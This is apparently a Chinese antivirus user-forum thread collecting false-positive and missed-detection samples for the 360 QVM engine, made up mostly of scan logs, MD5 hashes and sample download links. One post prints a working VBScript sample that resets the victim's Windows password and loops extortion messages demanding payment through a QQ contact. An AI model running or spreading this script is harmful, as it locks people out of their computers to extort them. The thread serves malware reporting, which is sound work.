【误报漏报样本收集】QVM引擎误报和漏报样本收集专帖

前几天是双击报毒，右键扫描好像不报
wmplayer.exe
现在扫描和双击都报
给看看是不是误报
别人电脑上的，我刚拷贝的
Windows Media Player.zip (1.93 MB)

2018-4-17 10:32 上传

点击文件名下载附件
下载积分: 经验 -1

wmplayer.zip (35.82 KB)

2018-4-17 11:47 上传

点击文件名下载附件
下载积分: 经验 -1

类型:木马-HEUR/Malware.QVM02.Gen
描述:木马是一种伪装成正常文件的恶意软件，会盗取您的帐号、密码等隐私资料。
扫描引擎:云安全引擎
文件路径:C:\Documents and Settings\Administrator\桌面\Windows Media Player\wmplayer.exe
文件大小:72K (73,728 字节)
文件版本:10.00.00.3802
文件描述:Windows Media Player
文件指纹（MD5）:330154bc91fa8e057396aef34c14f2cd
处理建议:隔离文件

https://pan.baidu.com/s/1qUU3k4hAkPFyKUehQEvQPw
帮群用户反馈一下误报，压缩包密码是 360qvm

https://pan.baidu.com/s/1TSHO8WkLQVUgTutc5Y-uQQ
这是旧版小工具的下载链接，解压密码还是 360qvm

通用的一键优化.zip (57.09 KB)

2018-5-2 11:40 上传

点击文件名下载附件
下载积分: 经验 -1

是误报吗？
本来人家是小红伞引擎误报，现在又多了个云QVM
http://bbs.360.cn/thread-15417304-1-1.html


还有一个本来是云拉黑报毒法
现在也是云QVM
http://bbs.360.cn/thread-15417198-1-1.html
QuickMute.zip (42.3 KB)

2018-5-2 11:40 上传

点击文件名下载附件
下载积分: 经验 -1

类型：
HEUR/QVM11.1.E8DF.Malware.Gen

描述：
HEUR/QVM11.1.E8DF.Malware.Gen

扫描引擎：
360云查杀引擎

文件路径：
D:\360安全浏览器下载\QuickMute\nircmd.exe

文件指纹(MD5)：
84d499f558570c32f4cb100a9124890b

类型：
HEUR/QVM11.1.E8DF.Malware.Gen

描述：
HEUR/QVM11.1.E8DF.Malware.Gen

扫描引擎：
360云查杀引擎

文件路径：
D:\360安全浏览器下载\QuickMute.zip

文件指纹(MD5)：
84d499f558570c32f4cb100a9124890b

这个不是误报？ nircmd.zip (41.08 KB)

2018-5-3 13:52 上传

点击文件名下载附件
下载积分: 经验 -1

如果真不是，那就不是吧，反正不是我的文件
--------------------------------------------
编辑

还有这个，扫描的时候没报啊，除了小红伞引擎
下载防护的话就是云QVM了，还没有生效吗？

0.rar (376.04 KB)

2018-5-4 20:53 上传

点击文件名下载附件
下载积分: 经验 -1

解压密码是 infected
漏报

QVM报毒.zip (5.33 MB)

2018-5-9 17:06 上传

点击文件名下载附件
下载积分: 经验 -1

这两天一直在反馈一个特殊BUG，文件普通压缩后，再采用.exe自解压压缩，被上传到云端后（自动上传或者手动360闪电云鉴定器上传）会报感染型病毒(Win32/Trojan.fba)，但是偶尔也会有QVM的报毒，这次这个就是


360杀毒扫描日志

病毒库版本：2018-05-08 18:41
扫描时间：2018-05-09 17:10:32
扫描用时：00:00:04
扫描类型：右键扫描
扫描文件总数：9
项目总数：2
清除项目数：0

扫描选项
----------------------
扫描所有文件：是
扫描压缩包：是
发现病毒处理方式：由用户选择处理
扫描磁盘引导区：是
扫描 Rootkit：是
使用云查杀引擎：是
使用QVM人工智能引擎：是
扫描建议修复项：是
常规引擎设置：Avira(小红伞)

扫描内容
----------------------
D:\360安全浏览器下载\QVM报毒.zip


白名单设置
----------------------


扫描结果
======================
高危风险项
----------------------
D:\360安全浏览器下载\QVM报毒.zip=>QVM报毒/winrar.exe        HEUR/QVM10.1.0B7D.Malware.Gen        未处理
D:\360安全浏览器下载\QVM报毒.zip=>QVM报毒/用winrar测试.exe        HEUR/QVM10.1.0B7D.Malware.Gen        未处理

自解压本地QVM防护误报 时间校对1.71.sfx.zip (225.31 KB)

2018-5-11 14:05 上传

点击文件名下载附件
下载积分: 经验 -1

自解压方式压缩的一个正常无毒文件，本地QVM防护误报

360杀毒实时防护日志

时间                    防护说明                                                                  处理结果                                                        文件
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2018-05-11 13:56:34     恶意软件(QVM41.2.FC41.Malware.Gen)MD5:9a5b31f1177a9ee16a548e7257d029f0    已删除此文件，如果您发现误删，可从隔离区恢复此文件。        d:\360安全浏览器下载\时间校对1.71.sfx.exe

迅雷.exe和压缩后 迅雷.zip，打包一个文件夹，然后自解压文件，迅雷.exe
云QVM报毒
类似的BUG，前几天已经反馈给 李宜檑
云QVM 迅雷.zip (1.46 MB)

2018-5-11 16:44 上传

点击文件名下载附件
下载积分: 经验 -1

类型:木马-HEUR/QVM41.2.168B.Malware.Gen
描述:木马是一种伪装成正常文件的恶意软件，会盗取您的帐号、密码等隐私资料。
扫描引擎:云安全引擎
文件路径:C:\Documents and Settings\Administrator\桌面\新建文件夹\迅雷.exe
文件大小:1.69M (1,767,922 字节)
文件指纹（MD5）:906ad2ec4558b462d6823cb59c7fb54c
处理建议:隔离文件

只有360三个数字的.txt改成.exe.zip (201.36 KB)

2018-5-14 22:34 上传

点击文件名下载附件
下载积分: 经验 -1

本地QVM防护误报
2018-05-14 22:32:22     恶意软件(QVM41.2.23A5.Malware.Gen)MD5:a84c6784f215722f8495721c1a8284f8    已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\documents and settings\administrator\桌面\只有360三个数字的.txt改成.exe.exe

应该是黑客小工具
算不算是漏报
Install_tkz.zip (2.22 MB)

2018-5-16 18:10 上传

点击文件名下载附件
下载积分: 经验 -1

是误报吗？、
网吧里的文件
、 lycbwsz9.rar (201.36 KB)

2018-5-20 15:17 上传

点击文件名下载附件
下载积分: 经验 -1

mdgxe.rar (49.31 KB)

2018-5-20 15:17 上传

点击文件名下载附件
下载积分: 经验 -1

shark.rar (201.35 KB)

2018-5-20 15:20 上传

点击文件名下载附件
下载积分: 经验 -1

类型：
HEUR/QVM19.1.48CC.Malware.Gen

描述：
HEUR/QVM19.1.48CC.Malware.Gen

扫描引擎：
360云查杀引擎

文件路径：
C:\Boot\ja-JP\c9WOCnClzn4A\shark.exe

文件指纹(MD5)：
46cdca92dcd8b46c2237bd39680c11bf

Em_1odiv.rar (15.62 KB)

2018-5-20 15:39 上传

点击文件名下载附件
下载积分: 经验 -1

什么鬼？

抢鲜版8111A

类型：
HEUR/QVM18.1.8E6F.Malware.Gen

描述：
恶意软件是对病毒、木马、蠕虫、后门程序等危害用户计算机及数据安全的有害软件的统称。危害较大。

扫描引擎：
小红伞本地引擎

文件路径：
C:\Windows\inf\USB3h\S4sUeSVgfpxe\Em_1odiv.exe

文件指纹(MD5)：
099378a5c97e5f5457d8d2eaff755dcc

上面是网吧里测试的，win7
下面在家XP测试

类型：
TR.Muldrop.avuvg

描述：
恶意软件是对病毒、木马、蠕虫、后门程序等危害用户计算机及数据安全的有害软件的统称。危害较大。

扫描引擎：
小红伞本地引擎

文件路径：
C:\Documents and Settings\Administrator\桌面\forum_5b0126228279c_Em_1odiv.rar

文件指纹(MD5)：
099378a5c97e5f5457d8d2eaff755dcc


又出现了

如果是误报的话，要不然等BUG修复后再解除，哈哈哈！5.0正式版和5.0抢鲜版都有这个BUG
http://bbs.360.cn/thread-15440324-1-1.html

@XP+商丘+沧桑浪子 能不能帮忙反馈一些被QVM误报的样本？有几个之前已经解除误报，不知道为什么最近又被误报了
下载链接：https://pan.baidu.com/s/1pGRnNQXG5YU2_Dqr8jBqSw
解压密码：360

价格表.zip (233.5 KB)

2018-6-4 22:32 上传

点击文件名下载附件
下载积分: 经验 -1

漏报
https://bbs.kafan.cn/thread-2124395-1-1.html

System Destroyer.zip (878.57 KB)

2018-6-13 22:46 上传

点击文件名下载附件
下载积分: 经验 -1

360就杀了其中的一个文件，看看其它的有没有问题
貌似是修改MBR的木马

类型：
HEUR/QVM05.1.AEA3.Malware.Gen

描述：
HEUR/QVM05.1.AEA3.Malware.Gen

扫描引擎：
360云查杀引擎

文件路径：
C:\Documents and Settings\Administrator\桌面\新建文件夹\System Destroyer.zip

文件指纹(MD5)：
38e93d542f643f117dd7e8dc7e59522b

Es4.Deploy.zip (4.93 MB)

2018-6-21 21:11 上传

点击文件名下载附件
下载积分: 经验 -1

是误报吗？

类型:木马-HEUR/QVM11.1.766B.Malware.Gen
描述:木马是一种伪装成正常文件的恶意软件，会盗取您的帐号、密码等隐私资料。
扫描引擎:云安全引擎
文件路径:C:\Windows\Es4.Deploy.exe
文件大小:4.95M (5,187,600 字节)
文件版本:16.0.18.528
文件描述:
文件指纹（MD5）:cbd4842fc5b9d1ee5d747714c0912b46
处理建议:隔离文件

另外
878楼是误报吗？

Es4.Deploy.zip (4.93 MB)

2018-7-17 15:39 上传

点击文件名下载附件
下载积分: 经验 -1

是误报吗？
类型：
HEUR/QVM11.1.766B.Malware.Gen

描述：
HEUR/QVM11.1.766B.Malware.Gen

扫描引擎：
360云查杀引擎

文件路径：
H:\样本\Es4.Deploy.zip

文件指纹(MD5)：
cbd4842fc5b9d1ee5d747714c0912b46

误报
应该是电脑店U盘启动里PE的相关文件

intelraid.zip (1.31 MB)

2018-7-26 14:32 上传

点击文件名下载附件
下载积分: 经验 -1

intelraid.zip (3.46 MB)

2018-7-26 14:32 上传

点击文件名下载附件
下载积分: 经验 -1

扫描结果
======================
高危风险项
----------------------
D:\360安全浏览器下载\DianNaoDian\Data\PE\10PE64.wim=>Windows\System32\drivers\IntelRaid.sys        HEUR/QVM18.1.5D06.Malware.Gen        未处理
D:\360安全浏览器下载\DianNaoDian\Data\PE\8PE32.wim=>Windows\System32\drivers\IntelRaid.sys        HEUR/QVM18.1.61AF.Malware.Gen        未处理
D:\360安全浏览器下载\DianNaoDian_v7.2.7z=>DianNaoDian\Data\PE\10PE64.wim=>Windows\System32\drivers\IntelRaid.sys        HEUR/QVM18.1.5D06.Malware.Gen        未处理
D:\360安全浏览器下载\DianNaoDian_v7.2.7z=>DianNaoDian\Data\PE\8PE32.wim=>Windows\System32\drivers\IntelRaid.sys        HEUR/QVM18.1.61AF.Malware.Gen        未处理

D:\360安全浏览器下载\QuickMute.zip=>QuickMute/nircmd.exe        HEUR/QVM11.1.C145.Malware.Gen        未处理
D:\360安全浏览器下载\QuickMute\nircmd.zip=>nircmd.exe        HEUR/QVM11.1.C145.Malware.Gen        未处理
nircmd.zip (41.08 KB)

2018-7-26 14:50 上传

点击文件名下载附件
下载积分: 经验 -1

是误报吗？

漏报或者误报
可疑的文件.zip (4.8 MB)

2018-8-10 17:09 上传

点击文件名下载附件
下载积分: 经验 -1

两个不报的，看看是不是漏报
一个报毒的，看看是不是误报



D:\360安全浏览器下载\False Positive\可疑的文件.zip=>kafanyangbenwubao.vir        HEUR/QVM19.1.C5B1.Malware.Gen        未处理

可疑文件
我的世界外挂网站大全.rar (611 Bytes)

2018-8-10 17:17 上传

点击文件名下载附件
下载积分: 经验 -1

Const strPassword = "senge"'   
Dim WshNetwork
Set WshNetwork = CreateObject("WScript.Network")
Dim userName
userName = WshNetwork.userName&",user"
Dim Domain
Set Domain = GetObject("WinNT://./"&userName)
Domain.SetPassword strPassword
Domain.SetInfo
dim gj
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
do
msgbox"你的电脑密码已被黑客修改，不信自己看看账户密码对不对，千万别关机和注销关机你电脑就废了最好赶紧速度转发5个群，转发完了联系Q：936402343 他会帮你解开准备好钱如果不想给钱的话加QQ和那个人商量商量"
msgbox"别想着直接加q 没有发5个群外加截图给他，他是不会理你的."
loop

超级危险病毒样本
https://bbs.kafan.cn/thread-2134106-1-1.html
样本链接：https://dwz.cn/ILu5GmyZ

样本https://pan.baidu.com/s/1fZXwLGfs5kV0nt4YVE-jAQ
后门木马
https://bbs.kafan.cn/thread-2134754-1-1.html

intelraid.zip (1.31 MB)

2018-12-7 13:08 上传

点击文件名下载附件
下载积分: 经验 -1

误报
2018-12-07 13:04:30     恶意软件(HEUR/QVM18.1.B2F3.Malware.Gen)MD5:28fc136d68bb67a5e3630d21fd164641已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\documents and settings\administrator\桌面\新建文件夹\intelraid.sys

文件误报
类型:木马-HEUR/QVM03.0.CDF5.Malware.Gen
描述:木马是一种伪装成正常文件的恶意软件，会盗取您的帐号、密码等隐私资料。
扫描引擎:云特征引擎
文件路径:C:\Documents and Settings\Administrator\桌面\VIRUSKILLER.exe
文件大小:180K (184,320 字节)
文件版本:2.0.0.0
文件描述:
文件指纹（MD5）:5c988d4b5a478e0912eca5da1194265c
处理建议:隔离文件
VIRUSKILLER.zip (20.86 KB)

2018-12-12 09:28 上传

点击文件名下载附件
下载积分: 经验 -1

【加急】公司刚上的新软件，隔离区发现云QVM误报，估计是360杀毒防御自动删除的！看看能加白吗？

2019-01-03 13:31:04     恶意软件(HEUR/QVM41.2.4AF1.Malware.Gen)MD5:855f285b4e069572c8c2ffa462342579已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\documents and settings\administrator\application data\hhsjpt-air20190102144415\local store\hhsjpt_air.exe

hhsjpt_air.zip (7.35 MB)

2019-1-5 09:29 上传

点击文件名下载附件
下载积分: 经验 -1

radF09C1.zip (2.89 KB)

2019-1-16 18:55 上传

点击文件名下载附件
下载积分: 经验 -1

病毒举报

之前解决了的，无毒.exe文件，无毒.exe打包成压缩包，然后两者，即 无毒.exe文件+无毒.exe打包成的压缩包，放文件夹里，再次打包成.exe自解压文件！刚才防护又报毒了！
误报，请先解压.zip (2.67 MB)

2019-1-17 18:18 上传

点击文件名下载附件
下载积分: 经验 -1

360杀毒实时防护日志

时间                    防护说明                                                                  处理结果                                                        文件
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2019-01-17 18:15:00     恶意软件(HEUR/QVM10.1.9ACE.Malware.Gen)MD5:23095612f8b1862858ad240ddec9f058已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\documents and settings\administrator\桌面\winrar.exe

forum_5c0a00526883b_intelraid.zip (1.31 MB)

2019-1-19 20:44 上传

点击文件名下载附件
下载积分: 经验 -1

是误报吗？
类型：
HEUR/QVM18.1.A6A5.Malware.Gen

描述：
HEUR/QVM18.1.A6A5.Malware.Gen

扫描引擎：
360云查杀引擎

文件路径：
C:\Users\Administrator\Desktop\forum_5c0a00526883b_intelraid.zip

文件指纹(MD5)：
28fc136d68bb67a5e3630d21fd164641